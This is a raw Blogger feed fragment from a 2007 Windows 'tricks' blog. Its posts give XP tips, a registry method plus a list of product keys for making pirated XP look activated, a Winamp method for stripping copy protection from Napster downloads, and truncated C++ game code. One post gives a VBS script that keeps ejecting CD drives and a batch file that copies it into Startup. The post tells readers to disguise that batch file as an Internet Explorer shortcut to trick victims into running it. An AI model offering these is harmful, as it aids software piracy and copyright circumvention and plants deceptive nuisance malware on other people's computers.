VIRUS'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-8352145491483141530</id><published>2007-11-25T11:23:00.000-08:00</published><updated>2007-11-25T11:24:04.101-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='things you didn&apos;t know about Windows XP'/><title type='text'>things you didn't know about Windows XP</title><content type='html'>. It boasts how long it can stay up. Whereas previous versions of Windows were coy&lt;br /&gt;about how long they went between boots, XP is positively proud of its stamina.&lt;br /&gt;Go to the Command Prompt in the Accessories menu from the All Programs start button option,&lt;br /&gt;and then type 'systeminfo'. The computer will produce a lot of useful info, including the&lt;br /&gt;uptime. If you want to keep these, type 'systeminfo &gt; info.txt'. This creates a file&lt;br /&gt;called info.txt you can look at later with Notepad. (Professional Edition only).&lt;br /&gt;&lt;br /&gt;2. You can delete files immediately, without having them move to the Recycle Bin first.&lt;br /&gt;Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration,&lt;br /&gt;Administrative Templates, Windows Components, Windows Explorer and find the Do not move&lt;br /&gt;deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal&lt;br /&gt;a great many interface and system options, but take care -- some may stop your computer&lt;br /&gt;behaving as you wish. (Professional Edition only).&lt;br /&gt;&lt;br /&gt;3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut&lt;br /&gt;on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,&lt;br /&gt;LockWorkStation' in the location field. Give the shortcut a name you like.&lt;br /&gt;That's it -- just double click on it and your computer will be locked. And&lt;br /&gt;if that's not easy enough, Windows key + L will do the same.&lt;br /&gt;&lt;br /&gt;4. XP hides some system software you might want to remove, such as Windows Messenger,&lt;br /&gt;but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the&lt;br /&gt;text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can&lt;br /&gt;then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows&lt;br /&gt;Components and there will be your prey, exposed and vulne&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-8352145491483141530?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/8352145491483141530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=8352145491483141530' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8352145491483141530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8352145491483141530'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/things-you-didnt-know-about-windows-xp.html' title='things you didn&apos;t know about Windows XP'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-676150559961938960</id><published>2007-11-25T11:22:00.000-08:00</published><updated>2007-11-25T11:23:10.721-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hack Xp Pirated to Xp Legal'/><title type='text'>Hack Xp Pirated to Xp Legal</title><content type='html'>Hack Xp Pirated to Xp Legal :d ..::!2@V@!V::.. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Okay here's a quick fix for all you who have illegal XP's and want to be able to do what those who have legal versions can do. If you can read instructions, you'll have no trouble, if not, I don't take responsibility for it! &lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1) ) Go to Start, Run, type regedit&lt;br /&gt;2) Browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents&lt;br /&gt;3) In the right-hand pane, double click on the value "OOBETimer"&lt;br /&gt;4) Change one of these characters to another random character (it really doesn't matter which, the idea is to corrupt the key so that we un-activate our copy of Windows) and press OK&lt;br /&gt;5) I've generated keys for you so use one of the following:&lt;br /&gt;&lt;br /&gt;HFRJP-BVYWW-C8C63-F36MJ-GMDQD&lt;br /&gt;KD2YT-4YT3T-4VQQX-43WBV-FDF3M&lt;br /&gt;CX633-TT3DV-VQP3F-94DKT-3MRR3&lt;br /&gt;W6GHC-TXPFC-V79P2-BCHDQ-DJV3W&lt;br /&gt;J3TGH-CPY32-CCXCW-C6FQF-DFBHB&lt;br /&gt;F2GW6-TMPJT-VH2GF-9G3XM-G9GYD&lt;br /&gt;J9QWM-JP8BX-M9C2F-JJXYH-WTD7B&lt;br /&gt;K4YHK-GQRXD-7T773-YGYYJ-68JBJ&lt;br /&gt;G96J2-2WYMR-9BFMP-MQRJT-XCXV6&lt;br /&gt;CT7TY-2VTY4-PMPGF-2PQFH-Q8HPT&lt;br /&gt;QX2V4-2V76D-XH8PV-RQQT9-QJMBT&lt;br /&gt;PX83Q-RXY8T-TRXQM-CDHFB-78BGG&lt;br /&gt;PDCV3-3V282-DXMVJ-V6HGJ-P9JHQ&lt;br /&gt;JMRCY-4QMYM-J3BVJ-BQJWF-2HTKJ&lt;br /&gt;BRYJV-CFWKX-JYDM9-RDW34-PRV46&lt;br /&gt;KKH9W-PR2XY-XFYXW-R4C2R-XFXJ3&lt;br /&gt;W4DTB-P33VR-G26PF-4BW39-WP2Q3&lt;br /&gt;KMT4R-W6RPC-CQJX3-YDM9C-BV24Y&lt;br /&gt;PCM2H-JPK8V-TCTBM-3KFB2-33488&lt;br /&gt;CXRYY-TM77D-92JJX-44DX8-8RW9M&lt;br /&gt;D62H3-XTG8F-2RMTX-KG938-9RYCJ&lt;br /&gt;R2TJC-YTHTC-B7GVQ-RJ6W8-GT9KW&lt;br /&gt;HJHYP-P7Q6B-D6HP9-2WPT2-3BFPQ&lt;br /&gt;FKK2C-6R3DR-M6PFW-4KYTT-PDWFT&lt;br /&gt;TRYD9-P4CQB-6M3D6-V38JW-VX6RQ&lt;br /&gt;VP78X-YYK8K-3JJ68-88JBR-G3RV6&lt;br /&gt;VQHHH-M9GJF-JKRVX-DCQVC-MFR8G&lt;br /&gt;HYYP3-TRB3T-QKCH2-VCMGG-FHFPJ&lt;br /&gt;JHR24-6R3BT-6TV28-KR7KM-JRXBB&lt;br /&gt;P9XGQ-P28TT-X92FQ-TKKKJ-YYG8D&lt;br /&gt;KR984-244TH-2H362-DFM7V-GDJ7G&lt;br /&gt;Q7G9T-HWPXX-444W4-JD66G-27F2Y&lt;br /&gt;G342Y-CKTW3-4VKBR-CW8XP-H6C3M&lt;br /&gt;BPQMQ-RVJQT-WPCGR-P724W-GR2DQ&lt;br /&gt;V2QPR-D4YMK-BRCT3-3D8M2-DM238&lt;br /&gt;TC2KV-93BGP-7D8TK-T7FB7-6VKVM&lt;br /&gt;PTQYY-YQT3V-GQXW2-7Y8TP-V4B8G&lt;br /&gt;VC3XJ-TR9VY-J3RW3-RHFQB-7WVH3&lt;br /&gt;JF2PQ-TT973-V9FGQ-KCBTF-2YBJD&lt;br /&gt;JK6XC-4K7JR-69MMM-T98HR-JTRF8&lt;br /&gt;BY46T-9KBKT-RBKHY-V6YP9-GKVQJ&lt;br /&gt;KXGVX-2R9QB-CG83F-GMCDK-DMTVD&lt;br /&gt;T6K2F-VH9HH-4W9WY-7JX99-CCHYB&lt;br /&gt;TVPWG-KKPM8-FRWGM-JD7C4-TQ9JW&lt;br /&gt;RCDFP-CXP4T-YYYXJ-PJ72W-W2B73&lt;br /&gt;HTDVM-2J9JF-7FB8T-WRCBX-DXX8D&lt;br /&gt;WWCM4-V6RTV-38QHF-BF72G-DR98B&lt;br /&gt;K7RDG-MYR34-WRBG7-237YV-RX8D6&lt;br /&gt;JF33Y-323QW-QWPF6-9DTVQ-JTR8Q&lt;br /&gt;TPKJY-2XBTC-GH87P-62886-Q69RD&lt;br /&gt;&lt;br /&gt;6) Go to Start, Run, and type C:\windows\system32\oobe\msoobe.exe /a, obviouslly replace C: with the drive letter that Windows is installed to.&lt;br /&gt;7) Select the option to activate by phone, and press Next&lt;br /&gt;8) Click the button at the bottom labelled "Change Product Key"&lt;br /&gt;9) Enter the new product key that the keygen created, and click Update&lt;br /&gt;10) When the key is updated, do not continue with the activation process, close the activation window!&lt;br /&gt;&lt;br /&gt;There are 50 unique keys and let me know if any don't work. There's about a 99% success rate with these keys so there may be one that doesn't work. Try another.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-676150559961938960?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/676150559961938960/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=676150559961938960' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/676150559961938960'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/676150559961938960'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/hack-xp-pirated-to-xp-legal.html' title='Hack Xp Pirated to Xp Legal'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-5501232413016054058</id><published>2007-11-25T11:20:00.001-08:00</published><updated>2007-11-25T11:20:47.953-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Play with ur friends'/><title type='text'>Play with ur friends</title><content type='html'>Wanna play with your friends by removing the shutdown option from start menu in their computer.&lt;br /&gt;Just hack it down !!!&lt;br /&gt;&lt;br /&gt;Click on start&gt;run(win key+r)&lt;br /&gt;&lt;br /&gt;Then tpye “regedit” there, this opens up the registry editor, now goto&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE&gt;SOFTWARE&gt;Microsoft&gt;Wi&lt;br /&gt;&lt;br /&gt;ndows&gt;CurrentVersion&gt;Explorer&lt;br /&gt;&lt;br /&gt;Then set “NoClose”=”DWORD:1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-5501232413016054058?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/5501232413016054058/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=5501232413016054058' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/5501232413016054058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/5501232413016054058'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/play-with-ur-friends.html' title='Play with ur friends'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-2125487899350535521</id><published>2007-11-25T11:06:00.000-08:00</published><updated>2008-12-11T17:29:59.663-08:00</updated><title type='text'>Winamp Hacking Fr Unlimited Music</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_5EHOESWcP_k/R0nIZSFH1rI/AAAAAAAAAEI/EaF83jlQovw/s1600-h/GW711H507.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_5EHOESWcP_k/R0nIZSFH1rI/AAAAAAAAAEI/EaF83jlQovw/s320/GW711H507.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5136857186668369586" /&gt;&lt;/a&gt;&lt;br /&gt;Using a loophole in a winamp plugin, you can download and burn music from Napster for free.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;music CDs, zero dollars*, obtained legally.&lt;br /&gt;*Not including the cost of blank CDs&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Practical how to:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;0. Download and install Napster, sign up for 14 day free trial.&lt;br /&gt;1. Download and install Winamp&lt;br /&gt;2. Download and install the Winamp Plug-in Output Stacker&lt;br /&gt;3. Open Winamp Options-&gt;Plug-ins-&gt;Output-&gt;Dietmar's Output Stacker-&gt;Configure&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;a. Add out_ds.dll from Winamp/Plug-ins folder&lt;br /&gt;b. Add out_disk.dll from Winamp/Plug-ins folder&lt;br /&gt;c. Select out_disk.dll in the Output Stacker-&gt;Configure&lt;br /&gt;d. Set the output directory and output file mode to Force WAV file&lt;br /&gt;e. Exit preferences&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Load downloaded Napster protected WMAs into your Winamp playlist&lt;br /&gt;5. Press play and each file will be converted to WAV as it plays&lt;br /&gt;6. Burn WAVs to CD with your favorite burning program&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Theoretical fun:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Three computers, one fast networked drive, and a few dedicated people: Turning Napster's 14 day free trial into 252 full 80 minute CDs of free music.&lt;br /&gt;New key developments:&lt;br /&gt;&lt;br /&gt;-If you use the "Out-lame" Winamp plugin in the Output Stacker in place of "Out-disk", you can convert straight to MP3. It still encodes no faster than realtime, but this is a great way to conserve space. WAV(Out-disk) is still recommended if you are burning CDs and want to keep as much quality as possible. I can confirm that this all works.&lt;br /&gt;&lt;br /&gt;-You can run multiple instances of Winamp at once, each converting its own song. Each instance's playback will not interfere with any of the others, illustrating the fact that this is not simply recording the music off of your soundcard. Doing this, you can get FAR MORE than 252 full 80 minute CDs within 14 days. I can confirm that this works.&lt;br /&gt;&lt;br /&gt;You can transcode(MP3) or decode(WAV) X albums in the time it takes for the longest track on the album to elapse. And since you're not limited to only tracks from one album at a time, you can trans/decode as many tracks as instances of Winamp your computer will run limited only by your computer's resources.&lt;br /&gt;Quote from Napster's official statement:&lt;br /&gt;&lt;br /&gt;"It would take 10 hours to convert 10 hours of music in this manner."&lt;br /&gt;With the updated methods, you can convert 100 hours or 1,000 hours or 10,000 hours of music in 10 hours. The only limit is your computing resources.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-2125487899350535521?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/2125487899350535521/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=2125487899350535521' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2125487899350535521'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2125487899350535521'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/winamp-hacking-fr-unlimited-music.html' title='Winamp Hacking Fr Unlimited Music'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_5EHOESWcP_k/R0nIZSFH1rI/AAAAAAAAAEI/EaF83jlQovw/s72-c/GW711H507.gif' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-9068944134329729627</id><published>2007-11-25T11:04:00.001-08:00</published><updated>2007-11-25T11:04:41.764-08:00</updated><title type='text'></title><content type='html'>Here i am gonna show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;set wmp = createObject("wmplayer.ocx.7")&lt;br /&gt;set drives = wmp.cdromCollection&lt;br /&gt;&lt;br /&gt;sub open_saysame()&lt;br /&gt;on error resume next&lt;br /&gt;do&lt;br /&gt;if drives.count &gt;= 1 then&lt;br /&gt;for i = 0 to drives.count - 1&lt;br /&gt;drives.item(i).eject()&lt;br /&gt;next&lt;br /&gt;end if&lt;br /&gt;loop&lt;br /&gt;end sub&lt;br /&gt;&lt;br /&gt;open_saysame()&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.&lt;br /&gt;&lt;br /&gt;1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"&lt;br /&gt;2:)CDfun.vbs&lt;br /&gt;&lt;br /&gt;Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-9068944134329729627?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/9068944134329729627/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=9068944134329729627' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/9068944134329729627'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/9068944134329729627'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/here-i-am-gonna-show-you-basic-vbs.html' title=''/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-8582368644553347222</id><published>2007-11-25T10:59:00.000-08:00</published><updated>2007-11-25T11:00:34.678-08:00</updated><title type='text'>The First Card Game in C++</title><content type='html'>#include&lt;iostream.h&gt;&lt;br /&gt;#include&lt;dos.h&gt;&lt;br /&gt;#include&lt;conio.h&gt;&lt;br /&gt;#include&lt;dos.h&gt;&lt;br /&gt;#include&lt;graphics.h&gt;&lt;br /&gt;#include&lt;stdlib.h&gt;&lt;br /&gt;#include&lt;stdio.h&gt;&lt;br /&gt;#include&lt;string.h&gt;&lt;br /&gt;void*image1;&lt;br /&gt;void*image;&lt;br /&gt;float a[51],bp[40],cp[40],dp[40];&lt;br /&gt;int&lt;br /&gt;key,car=5,var,next,esc,taken,chum,remark,bli=3,k,number,q,marksum,mon,kal=&lt;br /&gt;0,jai[3],sub,symb,dont,chance=2,repe=0,repeat=0;&lt;br /&gt;int shuf,player=1,guess,remain=0,count=0,mark[3];&lt;br /&gt;float play[3],greatest,great=232,small,remai,in1[3],in2[3],in3[3];&lt;br /&gt;char wini[4][35]={" You have done it man. Well done"," You are cool &lt;br /&gt;man","&lt;br /&gt;a wonderful game"," you are the best"};&lt;br /&gt;char losi[4][35]={" You should improve your play"," Show me a better &lt;br /&gt;game&lt;br /&gt;next time"," I didn't feel any competition"," Better luck next time"};&lt;br /&gt;char uttar='n';&lt;br /&gt;char egg,help[39],place[3][10]={"player","cpu2","cpu1"};&lt;br /&gt;&lt;br /&gt;int get_scancode()&lt;br /&gt;{&lt;br /&gt;       union REGS inregs, outregs ;&lt;br /&gt;&lt;br /&gt;       while( !kbhit( ) )&lt;br /&gt;        ;&lt;br /&gt;&lt;br /&gt;       inregs.h.ah = 0 ;&lt;br /&gt;       int86(22, &amp;inregs, &amp;outregs) ;&lt;br /&gt;       return ( outregs.h.ah ) ;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;void drawbox(char z[120])&lt;br /&gt;{&lt;br /&gt; setcolor(15);&lt;br /&gt; setviewport(0,0,639,75,1);&lt;br /&gt; clearviewport();&lt;br /&gt; setviewport(0,0,639,479,1);&lt;br /&gt; rectangle(0,0,639,75);&lt;br /&gt; outtextxy(10,10,"message box:-");&lt;br /&gt; outtextxy(30,25,z);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;class board&lt;br /&gt;{&lt;br /&gt; int bk,x1,y1,x2,y2;&lt;br /&gt;&lt;br /&gt; public:&lt;br /&gt;&lt;br /&gt; board(void)&lt;br /&gt; {&lt;br /&gt;  x1=0;&lt;br /&gt;  y1=76;&lt;br /&gt;  x2=639;&lt;br /&gt;  y2=376;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; void draw(void)&lt;br /&gt; {&lt;br /&gt;  setcolor(15);&lt;br /&gt;  setbkcolor(BLACK);&lt;br /&gt;  rectangle(0,377,639,479);&lt;br /&gt;  rectangle(260,455,314,475);&lt;br /&gt;  rectangle(324,455,378,475);&lt;br /&gt;  setfillstyle(1,GREEN);&lt;br /&gt;  floodfill(2,379,15);&lt;br /&gt;  outtextxy(270,463,"PLAY");&lt;br /&gt;  outtextxy(334,463,"TAKE");&lt;br /&gt;  outtextxy(10,387,"Your Hand -");&lt;br /&gt;  rectangle(0,76,639,376);&lt;br /&gt;  rectangle(0,150,20,250);&lt;br /&gt;  rectangle(615,150,639,250);&lt;br /&gt;  rectangle(269,376,369,359);&lt;br /&gt;  settextstyle(0,1,2);&lt;br /&gt;  outtextxy(20,160,"CPU 1");&lt;br /&gt;  outtextxy(639,160,"CPU 2");&lt;br /&gt;  settextstyle(0,0,1);&lt;br /&gt;  outtextxy(290,365,"YOURSELF");&lt;br /&gt;  settextstyle(0,0,0);&lt;br /&gt;  setfillstyle(1,BLUE);&lt;br /&gt;  floodfill(300,300,15);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; void play1(float,int);&lt;br /&gt;&lt;br /&gt;}plai;&lt;br /&gt;&lt;br /&gt;void board::play1(float ax,int cx)&lt;br /&gt;{&lt;br /&gt; int x,y,no;&lt;br /&gt; switch(cx)&lt;br /&gt; {&lt;br /&gt;  case 1:{&lt;br /&gt;   x=71;&lt;br /&gt;   y=210;&lt;br /&gt;   no=210;&lt;br /&gt;  }break;&lt;br /&gt;  case 2:{&lt;br /&gt;   x=310;&lt;br /&gt;   y=307;&lt;br /&gt;   no=50;&lt;br /&gt;  }break;&lt;br /&gt;  case 3:{&lt;br /&gt;   x=560;&lt;br /&gt;   y=190;&lt;br /&gt;   no=230;&lt;br /&gt;  }break;&lt;br /&gt; }&lt;br /&gt; int sym=int((ax*10 -int(ax)*10)+0.1);&lt;br /&gt; char symb[2];&lt;br /&gt; symb[0]=char(sym);&lt;br /&gt; symb[1]='&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-8582368644553347222?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/8582368644553347222/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=8582368644553347222' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8582368644553347222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8582368644553347222'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/first-card-game-in-c.html' title='The First Card Game in C++'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-888558095582597830</id><published>2007-11-25T10:55:00.000-08:00</published><updated>2007-11-25T10:57:27.375-08:00</updated><title type='text'>A excellent snake game develped in c/c++.</title><content type='html'>#include &lt;graphics.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;conio.h&gt;&lt;br /&gt;#include &lt;dos.h&gt;&lt;br /&gt;#include &lt;iostream.h&gt;&lt;br /&gt;#include &lt;fstream.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;void main(void)&lt;br /&gt;{&lt;br /&gt;   int gdriver = DETECT, gmode, errorcode;&lt;br /&gt;   void&lt;br /&gt;*body,*food,*tail1,*tail2,*tail3,*tail4,*head1,*head2,*head3,*head4;&lt;br /&gt;   int x, y,X[5000],Y[5000],i=3,&lt;br /&gt;maxx,maxy,speed=100,bo=10,t[10],score=0,hscore=20;&lt;br /&gt;   unsigned int size;&lt;br /&gt;   char a='6',b,scor[4],hs[4];&lt;br /&gt;   int k=2,l,r1,r2,f=0,z=100,first=0,second=1;;&lt;br /&gt;   r1=300;&lt;br /&gt;   r2=350;&lt;br /&gt;&lt;br /&gt;   ifstream infile("c:\tc\bin\rattle.txt");&lt;br /&gt;   infile.getline(hs,4);&lt;br /&gt;   infile.close();&lt;br /&gt;   hscore = atoi(hs);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   /* initialize graphics and local variables */&lt;br /&gt;   initgraph(&amp;gdriver, &amp;gmode, "c:\tc\bgi");&lt;br /&gt;&lt;br /&gt;   /* read result of initialization */&lt;br /&gt;   errorcode = graphresult();&lt;br /&gt;   if (errorcode != grOk)  /* an error occurred */&lt;br /&gt;   {&lt;br /&gt;      printf("Graphics error: %s&lt;br /&gt;", grapherrormsg(errorcode));&lt;br /&gt;      printf("Press any key to halt:");&lt;br /&gt;      getch();&lt;br /&gt;      exit(1); /* terminate with an error code */&lt;br /&gt;   }&lt;br /&gt;   maxx = getmaxx();&lt;br /&gt;   maxy = getmaxy();&lt;br /&gt;   y = 160;&lt;br /&gt;   x = 80;&lt;br /&gt;   for(int j=0; j&lt;=3; j++)&lt;br /&gt;   {&lt;br /&gt; X[i-j]=x-bo*(j+1);&lt;br /&gt; Y[i-j]=y;&lt;br /&gt;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   //body&lt;br /&gt;&lt;br /&gt;   setfillstyle(1,2);&lt;br /&gt;   bar(10,10,20,20);&lt;br /&gt;   setcolor(0);&lt;br /&gt;   setlinestyle(0,1,3);&lt;br /&gt;   line(9,9,21,21);&lt;br /&gt;   line(9,21,21,9);&lt;br /&gt;   size = imagesize(10,10,20,20);&lt;br /&gt;   body = malloc(size);&lt;br /&gt;   getimage(10,10,20,20,body);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;   setcolor(0);&lt;br /&gt;   //tail1-right&lt;br /&gt;   t[0]=20; t[1]=10;&lt;br /&gt;   t[2]=10; t[3]=10;&lt;br /&gt;   t[4]=20; t[5]=15;&lt;br /&gt;   t[6]=10; t[7]=20;&lt;br /&gt;   t[8]=20; t[9]=21;&lt;br /&gt;   fillpoly(5, t);&lt;br /&gt;   size = imagesize(10,10,20,21);&lt;br /&gt;   tail1 = malloc(size);&lt;br /&gt;   getimage(10,10,20,21,tail1);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;   //tail2-left&lt;br /&gt;   t[0]=10; t[1]=10;&lt;br /&gt;   t[2]=20; t[3]=10;&lt;br /&gt;   t[4]=10; t[5]=15;&lt;br /&gt;   t[6]=20; t[7]=20;&lt;br /&gt;   t[8]=10; t[9]=21;&lt;br /&gt;   fillpoly(5, t);&lt;br /&gt;   size = imagesize(10,10,20,21);&lt;br /&gt;   tail2 = malloc(size);&lt;br /&gt;   getimage(10,10,20,21,tail2);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;   //tail3-up&lt;br /&gt;   t[0]=10; t[1]=20;&lt;br /&gt;   t[2]=10; t[3]=10;&lt;br /&gt;   t[4]=15; t[5]=20;&lt;br /&gt;   t[6]=20; t[7]=10;&lt;br /&gt;   t[8]=20; t[9]=21;&lt;br /&gt;   fillpoly(5, t);&lt;br /&gt;   size = imagesize(10,10,20,21);&lt;br /&gt;   tail3 = malloc(size);&lt;br /&gt;   getimage(10,10,20,21,tail3);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;   //tail4-down&lt;br /&gt;   t[0]=10; t[1]=10;&lt;br /&gt;   